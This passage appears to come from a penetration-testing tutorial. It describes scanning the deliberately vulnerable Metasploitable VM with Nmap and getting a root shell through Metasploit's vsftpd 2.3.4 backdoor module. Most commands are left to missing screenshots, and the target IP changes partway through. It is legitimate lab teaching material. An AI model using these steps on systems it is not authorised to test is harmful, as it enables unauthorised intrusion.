When trying to learn how to scan and exploit a Linux machine, one major problem we encounter is where to try. For this purpose, the Metasploit team has developed and released a virtual machine called Metasploitable. This machine has been made vulnerable purposefully, having many services running unpatched. Due to this, it has become a great platform for practicing or developing penetration testing skills. In this section, we will learn how to scan a Linux system and then, using the scanning result, how to find a service that is vulnerable. Using that vulnerable service, we shall gain root access to the system.

Kali Linux and the Metasploitable VMware system will be used in this section. The image file of Metasploitable can be downloaded from these links:

• http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
• https://images.offensive-security.com/virtual-images/kali-linux-2018.2-vm-i386.zip

The Metasploit Framework is an open source tool used by security professionals globally to perform penetration tests by executing exploit code on target systems from within the framework. It comes pre-installed with Kali Linux (the preferred choice of distribution for security professionals).

Follow these steps to gain root access to a vulnerable Linux system:

1. First open the Metasploit console on the Kali system by running the following command:

service postgresql start
msfconsole

2. At the bottom of the screen, you should get the Metasploit framework prompt denoted by msf>.
3. Next, we need to scan the target, which is 192.168.0.102 in this example, using Nmap:

The following screenshot shows the output of the command:

4. In the previous command, you can see there are many services running on different ports. Among them you can see FTP is also running on port 21.
5. We will focus on the FTP service for now. From the output shown, you can see that the FTP service is provided by the vsftpd application version 2.3.4.
6. Now lets try to find an exploit for vsftpd within the Metasploit framework by simply executing the command search vsftpd. Here is the output:

7. The search results are showing a module, VSFTPD Backdoor Command Execution, with an excellent rating, which means that this exploit will work perfectly fine.

8. Now run the following commands to use the exploit and check its options:
   

9. As you can see from the screenshot, you need to set the value of RHOST, which is 192.168.1.102 in our case.
10. Set the value for RHOST and then run the exploit as shown here:

11. Once the exploit runs successfully, you will get root access, as shown in the preceding screenshot.

We first did an Nmap scan to check for running services and open ports and found the FTP service running. Then we tried to find the version of the FTP service. Once we got the information, we searched for any exploit available for VSFTPD. The VSFTPD backdoor module that was found in the search result is actually a code that is being sent to the target machine by the Metasploit framework. The code gets executed on the target machine due to a module of the VSFTPD being improperly programmed. Once the code gets executed, we get a root shell access on our Kali machine

Using the exploit found for VSFTPD, we tried to attack the target system and got the root shell on it.

Let's learn about a few more exploits and attacks that are common in Linux.